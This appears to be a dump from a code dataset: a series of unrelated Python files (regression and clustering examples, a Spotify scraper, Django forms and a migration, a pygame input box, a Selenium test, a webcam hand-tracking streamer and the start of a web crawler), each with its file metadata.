84, "usage_type": "call"}, {"api_name": "numpy.where", 
"line_number": 91, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.insert", "line_number": 140, "usage_type": "call"}, {"api_name": "tools.csv_helper.write_csv_with_metadata", "line_number": 146, "usage_type": "call"}, {"api_name": "tools.csv_helper", "line_number": 146, "usage_type": "name"}, {"api_name": "tools.csv_helper.parse_selection_arguments", "line_number": 153, "usage_type": "call"}, {"api_name": "tools.csv_helper", "line_number": 153, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 153, "usage_type": "attribute"}, {"api_name": "tools.csv_helper.read_csv_and_metadata", "line_number": 154, "usage_type": "call"}, {"api_name": "tools.csv_helper", "line_number": 154, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 165, "usage_type": "call"}, {"api_name": "re.match", "line_number": 166, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 174, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 174, "usage_type": "call"}]} +{"seq_id": "217947270", "text": "# coding=utf-8\n\n\nimport pandas\n\nfrom Regressions.MultivariateLinearRegression import MultivariateLinearRegression, GradientDescent\nfrom utils import add_bias_column, polynomial_addition_1d\n\n\"\"\" Импорт исходных данных из файлов \"\"\"\n\ndj = pandas.read_csv(\"../data/D&J-IND_101001_171001.txt\")\ngasp = pandas.read_csv(\"../data/GAZP_101001_171001.txt\")\nyndx = pandas.read_csv(\"../data/YNDX_101001_171001.txt\")\n\n\"\"\" Предварительная обработка данных \"\"\"\n\nres = pandas.merge(dj, gasp, on='', suffixes=['_DJ', '_GASP'])\nres1 = pandas.merge(res, yndx, on='', suffixes=['_1', '_YNDX'])\ny = res1['_DJ']\nx1 = res1['_GASP']\nx2 = res1['']\n\n\"\"\"Нормализация данных \"\"\"\n\nx1 = (x1 - min(x1)) / (max(x1) - min(x1))\nx2 = (x2 - min(x2)) / (max(x2) - min(x2))\ny = (y - min(y)) / (max(y) - min(y))\n\n\"\"\" Подготовка факторов \"\"\"\n\nx = pandas.concat([x1, x2], axis=1).as_matrix()\nx = add_bias_column(x)\n\n\"\"\" Построение и обучение модели \"\"\"\n\nmodel = MultivariateLinearRegression(degree=2)\nmodel.learning_curve(x, y, plot=True)\nmodel.overfitting_curve(x, y, plot=True)\nmodel.alpha_curve(x, y, plot=True)\nmodel.lambda_curve(x, y, plot=True)\n\nmodel = MultivariateLinearRegression(degree=2)\nmodel.trainer = GradientDescent(model=model, epochs=100)\nmodel.learning_curve(x, y, plot=True)\nmodel.overfitting_curve(x, y, plot=True)\nmodel.alpha_curve(x, y, plot=True, test_size=100)\nmodel.lambda_curve(x, y, plot=True, test_size=100)\n\nmodel = MultivariateLinearRegression(degree=5)\nmodel.trainer = GradientDescent(model=model, epochs=100)\nx1_poly = polynomial_addition_1d(x1.reshape((len(x1), 1)), 5)\nx1_poly = add_bias_column(x1_poly)\nmodel.learning_curve(x1_poly, y, 
plot=True)\nmodel.overfitting_curve(x1_poly, y, plot=True)\nmodel.alpha_curve(x1_poly, y, plot=True, test_size=100)\n", "sub_path": "examples/1 Linear regression example.py", "file_name": "1 Linear regression example.py", "file_ext": "py", "file_size_in_byte": 1896, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.add_bias_column", "line_number": 32, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.MultivariateLinearRegression", "line_number": 36, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.MultivariateLinearRegression", "line_number": 42, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.GradientDescent", "line_number": 43, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.MultivariateLinearRegression", "line_number": 49, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.GradientDescent", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.polynomial_addition_1d", "line_number": 51, "usage_type": "call"}, {"api_name": "utils.add_bias_column", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "160214693", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 16:59:50 2019\r\n\r\n@author: hp\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nveriler = pd.read_csv(\"musteriler.csv\")\r\n\r\nX = veriler.iloc[:,3:].values # from the 2nd column up to the 4th\r\n\r\n\r\nfrom sklearn.cluster import KMeans\r\n\r\nkmeans = KMeans(n_clusters = 3, init = \"k-means++\")\r\n\r\nkmeans.fit(X)\r\n\r\nprint(kmeans.cluster_centers_)\r\nsonuclar = []\r\n\r\nfor i in range(1,11) :\r\n    kmeans = KMeans(n_clusters = i,init = \"k-means++\", random_state = 123)\r\n    kmeans.fit(X)\r\n    sonuclar.append(kmeans.inertia_) # inertia = gives the WCSS values.\r\n\r\nplt.plot(range(1,11),sonuclar)\r\n\r\n", "sub_path": "Python ile Makine Öğrenmesi Eğitimi/Bölüm 21/K-Means.py", "file_name": "K-Means.py", "file_ext": "py", "file_size_in_byte": 721, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "192991147", "text": "import spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport pandas as pd\nimport sys\nimport json\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef get_playlist_tracks(playlist_id, sp):\n    results = sp.user_playlist_tracks(\"spotify\", playlist_id)\n    total_songs = results[\"total\"]\n    
items = results['items']\n i = 1\n while results['next']:\n results = sp.next(results)\n items.extend(results['items'])\n print(\"Processed songs: \" + str(i*100) + \"/\" + str(total_songs))\n i += 1\n print(\"Finished!\")\n name_songs = []\n artists_songs = []\n uri_songs = []\n year_songs = []\n popularity_songs = []\n explicit_songs = []\n for i in items:\n if i != None:\n name_songs.append(i[\"track\"][\"name\"])\n artists_songs.append([i[\"track\"][\"artists\"][j][\"name\"] for j in range(len(i[\"track\"][\"artists\"]))])\n uri_songs.append(i[\"track\"][\"uri\"])\n year_songs.append(i[\"track\"][\"album\"][\"release_date\"][:4])\n popularity_songs.append(i[\"track\"][\"popularity\"])\n explicit_songs.append(i[\"track\"][\"explicit\"])\n return name_songs, artists_songs, uri_songs, year_songs, popularity_songs, explicit_songs\n\ndef get_audio_features_tracks(uri_songs_list, sp):\n keys = ['danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness',\n 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo',\n 'type', 'id', 'uri', 'track_href', 'analysis_url', 'duration_ms',\n 'time_signature']\n\n songs_audio_features = []\n\n i = 0\n\n for song_uri in uri_songs_list:\n songs_audio_features.append(sp.audio_features(song_uri)[0].values())\n if i % 100 == 0:\n print(\"Processed: \" + str(i) + \"/\" + str(len(uri_songs_list)))\n i += 1\n\n print(\"Processed: \" + str(i) + \"/\" + str(len(uri_songs_list)))\n\n df_audio_features = pd.DataFrame(songs_audio_features)\n\n df_audio_features.columns = keys\n\n df_audio_features.drop(df_audio_features.columns[[11, 12, 14, 15, 17]], axis=1, inplace=True)\n\n return df_audio_features\n\ndef main():\n path = \"../../\"\n f = open(path + \"spotify_credentials.txt\", \"r\")\n dict_credentials = json.loads(f.read()[:-1])\n\n sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(\n client_id=dict_credentials[\"client_id\"],\n client_secret=dict_credentials[\"client_secret\"]))\n\n input_url_playlist = input(\"URL of the playlist to append:\")\n\n if input_url_playlist[:34] != \"https://open.spotify.com/playlist/\":\n print(\"Wrong URL format!!!\")\n sys.exit()\n\n name_songs, artists_songs, uri_songs, year_songs, popularity_songs, explicit_songs = get_playlist_tracks(input_url_playlist, sp)\n\n song_dataframe_dict = {\"name\": name_songs, \"artist\": artists_songs,\n \"uri\": uri_songs, \"year\": year_songs,\n \"popularity\": popularity_songs, \"explicit\": explicit_songs}\n\n song_dataframe = pd.DataFrame(song_dataframe_dict)\n\n song_dataframe.to_csv(\"../data/songs.csv\", index=False)\n\n audio_features_dataframe = get_audio_features_tracks(uri_songs, sp)\n\n audio_features_dataframe.to_csv(\"../data/audio_features.csv\", index=False)\n\n df_new = song_dataframe.merge(audio_features_dataframe, how='left', on='uri')\n\n df_new[\"artist_1\"] = df_new[\"artist\"].apply(lambda x: str(x[0]))\n df_new[\"artist_2\"] = df_new[\"artist\"].apply(lambda x: str(x[1]) if len(x) > 1 else None)\n\n df_new = df_new[['name', 'artist_1', 'artist_2', 'uri', 'year', 'popularity', 'explicit', 'duration_ms', 'danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo']]\n\n mypath = \"../data/\"\n files = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n fileName = \"songs_all.csv\"\n\n if fileName in files:\n df_previous = pd.read_csv(\"../data/songs_all.csv\")\n print(\"Previous database len:\", len(df_previous))\n df_all = 
pd.concat([df_previous,df_new]).drop_duplicates().reset_index(drop=True)\n print(\"New database len:\", len(df_all))\n df_all.to_csv(\"../data/songs_all.csv\", index=False)\n else:\n df_new.to_csv(\"../data/songs_all.csv\", index=False)\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "code/song_database_generator.py", "file_name": "song_database_generator.py", "file_ext": "py", "file_size_in_byte": 4310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 65, "usage_type": "call"}, {"api_name": "spotipy.Spotify", "line_number": 67, "usage_type": "call"}, {"api_name": "spotipy.oauth2.SpotifyClientCredentials", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "365293680", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dpclab', '0004_workout_tsb_d'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PMCPoint',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('date', models.DateTimeField()),\n ('atl_d', models.FloatField(null=True)),\n ('ctl_d', models.FloatField(null=True)),\n ('tsb_d', models.FloatField(null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='workout',\n name='atl_d',\n ),\n migrations.RemoveField(\n model_name='workout',\n name='ctl_d',\n ),\n migrations.RemoveField(\n model_name='workout',\n name='tsb_d',\n ),\n migrations.AddField(\n model_name='athlete',\n name='pmc_seed',\n field=models.DateTimeField(default=datetime.datetime(2014, 9, 30, 20, 14, 59, 218788)),\n preserve_default=True,\n ),\n ]\n", "sub_path": "dpclab/migrations/0005_auto_20140930_2014.py", "file_name": "0005_auto_20140930_2014.py", "file_ext": "py", "file_size_in_byte": 1284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 21, "usage_type": "call"}, 
{"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 36, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "560676919", "text": "# Vamos a extender el formulario para incluir el email obligatorio al registrarse \nfrom django import forms \nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import Profile\n\nclass UserCreationFormWithEmail(UserCreationForm):\n\n email = forms.EmailField(required = True, help_text = \"Requerido, 254 caracteres como máximo y debe ser válido\")\n # Redefinimos la clase Meta\n class Meta: \n model = User\n fields = ['username', 'email','password1','password2']\n\n # Se añade una validación para evitar que 2 usuarios tengan el mismo email\n def clean_email(self):\n # Recuperamos el email escrito por pantalla\n email = self.cleaned_data.get(\"email\")\n # Filtramos en la BD si algún usuario tiene este email\n if User.objects.filter(email = email).exists():\n # Lanzamos un error si existe\n raise forms.ValidationError(\"El email ya esta registrado, pruebe con otra dirección de correo electrónico\")\n # si no existe , devuelve el email\n return email \n\n#Clase para el formulario del perfil \nclass ProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['avatar', 'bio', 'link']\n widgets = {\n 'avatar': forms.ClearableFileInput(attrs={'class':'form-control-file mt-3'}),\n 'bio': forms.Textarea(attrs={'class':'form-control mt-3', 'rows':3, 'placeholder':'Biografía'}),\n 'link': forms.URLInput(attrs={'class':'form-control mt-3', 'placeholder':'Enlace'}),\n }\n\n# Clase para editar el email\nclass EmailForm(forms.ModelForm):\n email = forms.EmailField(required = True, help_text = \"Requerido, 254 caracteres como máximo y debe ser válido\")\n class Meta: \n model = User\n fields = ['email']\n\n # Validación para ver si el email se ha modificado \n def clean_email(self):\n email = self.cleaned_data.get(\"email\")\n # change data es una lista que contiene lo q se ha modificado\n if 'email' in self.changed_data:\n if User.objects.filter(email = email).exists():\n # Lanzamos un error si existe\n raise forms.ValidationError(\"El email ya esta registrado, pruebe con otra dirección de correo electrónico\")\n # si no existe , devuelve el email\n return email ", "sub_path": "registration/forms.py", 
"file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 2368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.contrib.auth.forms.UserCreationForm", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 22, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "models.Profile", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.ClearableFileInput", "line_number": 32, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 32, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 33, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 33, "usage_type": "name"}, {"api_name": "django.forms.URLInput", "line_number": 34, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 34, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 38, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 41, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 49, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 51, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "98486351", "text": "import pygame, string\nfrom pygame.locals import *\nimport config\n\n\ndef get_key():\n while 1:\n event = pygame.event.poll()\n if event.type == KEYDOWN:\n return event.key\n else:\n pass\n\n\ndef display_box_(screen, message, size,position):\n fontobject = pygame.font.Font(None, 30)\n pygame.draw.rect(screen, (0, 0, 0),\n (position[0] - size[0]/2-5,\n position[1] - size[1]/2-5,\n size[0]+10,size[1]+10), 0)\n pygame.draw.rect(screen, config.CYAN,\n [position[0] - size[0] / 2,\n position[1] - size[1] / 2,\n size[0], size[1]], )\n if len(message) != 0:\n screen.blit(fontobject.render(message, 1, (0,0,0)),\n (position[0]-7, position[1]-8))\n pygame.display.update()\n\n\ndef display_box(screen, message, size):\n fontobject = pygame.font.Font(None, 30)\n pygame.draw.rect(screen, (0, 0, 0),\n ((screen.get_width() / 2) - 100,\n (screen.get_height() / 2) - 10,\n 200, 20), 0)\n pygame.draw.rect(screen, config.CYAN,\n [(screen.get_width() / 2) - size[0] / 2,\n (screen.get_height() / 2) - 
size[1] / 2,\n size[0], size[1]], )\n if len(message) != 0:\n screen.blit(fontobject.render(message, 1, (0,0,0)),\n ((screen.get_width() / 2) - size[0] / 2 + 20, (screen.get_height() / 2) - size[1] / 2 + 10))\n pygame.display.update()\n\n\ndef ask(screen, question, size):\n pygame.font.init()\n current_string = []\n display_box(screen, question + \" : \" + string.join(current_string, \"\"), size)\n while 1:\n inkey = get_key()\n if inkey == K_BACKSPACE:\n current_string = current_string[0:-1]\n elif inkey == K_ESCAPE:\n return None\n elif inkey == K_RETURN:\n break\n elif inkey == K_MINUS:\n current_string.append(\"_\")\n elif inkey <= 127:\n current_string.append(chr(inkey))\n display_box(screen, question + \" : \" + string.join(current_string, \"\"), size)\n return string.join(current_string, \"\")\n\n#pygame.font.init()\n#screen = pygame.display.set_mode(config.screen_size)\n#while True:\n# display_box_(screen,str(5),[40,40],[100,100])\n", "sub_path": "MyGame/input_box.py", "file_name": "input_box.py", "file_ext": "py", "file_size_in_byte": 2365, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pygame.event.poll", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.CYAN", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 37, "usage_type": "attribute"}, {"api_name": "config.CYAN", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 48, "usage_type": "attribute"}, {"api_name": "string.join", "line_number": 50, "usage_type": "call"}, {"api_name": "string.join", "line_number": 63, "usage_type": "call"}, {"api_name": "string.join", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "649391169", "text": "# A program that uses a fixture with the autouse parameter\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\n\nlink = \"http://selenium1py.pythonanywhere.com/\"\n\n\n@pytest.fixture\ndef driver():\n print(\"\\nstart driver for test..\")\n options = Options()\n options.add_argument(\"--no-sandbox\")\n service = 
Service(\"/chromedriver/stable/chromedriver\")\n driver = webdriver.Chrome(options=options, service=service)\n yield driver\n print(\"\\nquit driver..\")\n driver.quit()\n\n@pytest.fixture(autouse=True)\ndef prepare_data():\n print()\n print(\"preparing some critical data for every test\")\n\n\nclass TestMainPage1():\n def test_guest_should_see_login_link(self, driver):\n # не передаём как параметр фикстуру prepare_data, но она все равно выполняется\n driver.get(link)\n driver.find_element(By.CSS_SELECTOR, \"#login_link\")\n\n def test_guest_should_see_basket_link_on_the_main_page(self, driver):\n driver.get(link)\n driver.find_element(By.CSS_SELECTOR, \".basket-mini .btn-group > a\")\n\n\n ", "sub_path": "selenium_course/l34-6.py", "file_name": "l34-6.py", "file_ext": "py", "file_size_in_byte": 1240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 16, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 17, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 32, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 36, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "310470401", "text": "import cv2\r\nimport io\r\nimport socket\r\nimport struct\r\nimport time\r\nimport pickle\r\nimport zlib\r\nimport FDM\r\nimport HTM\r\nimport math\r\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nclient_socket.connect(('192.168.1.6', 2501))\r\nconnection = client_socket.makefile('wb')\r\n\r\ncam = cv2.VideoCapture(0)\r\n\r\ncam.set(3, 2048);\r\ncam.set(4, 2048);\r\n\r\nimg_counter = 0\r\npt=0\r\nencode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\r\nDET=HTM.HD(Detect_confi=0.7)\r\nDE=FDM.FD(min_detection_confidence=0.7)\r\nwhile True:\r\n ret, img = cam.read()\r\n img=DET.findHands(img)\r\n lmlist=DET.findpos(img,draw=True)\r\n img=DE.findFace(img)\r\n flmlist=DE.lm(img,draw=True)\r\n if flmlist==0:\r\n print(\"No Face Detected\")\r\n if len(lmlist)!=0:\r\n \r\n #4-thumb 8- index\r\n x1,y1=lmlist[4][1],lmlist[4][2]\r\n x2,y2=lmlist[8][1],lmlist[8][2]\r\n cx,cy=(x1+x2)//2,(y1+y2)//2\r\n cv2.circle(img,(x1,y1),5,(0,255,255),cv2.FILLED)\r\n cv2.circle(img,(x2,y2),5,(0,255,255),cv2.FILLED)\r\n cv2.line(img,(x1,y1),(x2,y2),(0,0,255),2)\r\n cv2.circle(img,(cx,cy),5,(255,0,255),cv2.FILLED)\r\n cv2.circle(img,(cx,cy),5,(0,255,255),cv2.FILLED) \r\n ct=time.time()\r\n fps=1/(ct-pt)\r\n pt=ct\r\n cv2.putText(img,str(int(fps)),(10,70),cv2.FONT_HERSHEY_COMPLEX,3,(255,255,0),3)\r\n result, frame = cv2.imencode('.jpg', img, encode_param)\r\n data = pickle.dumps(frame, 0)\r\n size = len(data)\r\n\r\n\r\n print(\"{}: {}\".format(img_counter, size))\r\n client_socket.sendall(struct.pack(\">L\", size) + data)\r\n img_counter += 1\r\n\r\ncam.release()", "sub_path": "client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 1591, 
"program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "socket.socket", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 22, "usage_type": "attribute"}, {"api_name": "HTM.HD", "line_number": 23, "usage_type": "call"}, {"api_name": "FDM.FD", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 42, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 43, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 48, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 49, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "10572668", "text": "# -*- coding=utf-8 -*-\n'''\nAuthor: TianRan\nDate: 7/22/16\nVersion:\n07/22:\n 1: only consider the Beijing housing at this time\n 2: consider different area in Beijing, like HaiDian, ChaoYang, etc\n\n07/23:\n 1: add the configurations for area and web mapping for different cities in china,\n\n08/03:\n 1: add the log\n08/09:\n 1: modify the url for Suzhou and Shanghai for special after debuging\n 2: save the result to the json file\n09/11:\n add the project root dir to the enviroment, this is useful when\n we deploy the project in server.\n'''\nfrom __init__ import *\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom collections import defaultdict\nimport logging\nimport json\n\n# functions from util package\nfrom utils.path_util import *\nfrom utils.log_util import log_format\n\n# Beijing area map for different url in lianjia website\nfrom lianjia_confg import LIANJIA_MAP\n\n# set the format for the log\nlog_format(PROJECT_DIR + '/logs/crawler')\n\n\nclass LianJiaCrawler(object):\n '''\n crawling the housing price for different areas in china\n '''\n\n def __init__(self, url, area_map):\n '''\n\n :param url: the root website: 'http://bj.fang.lianjia.com'\n\n 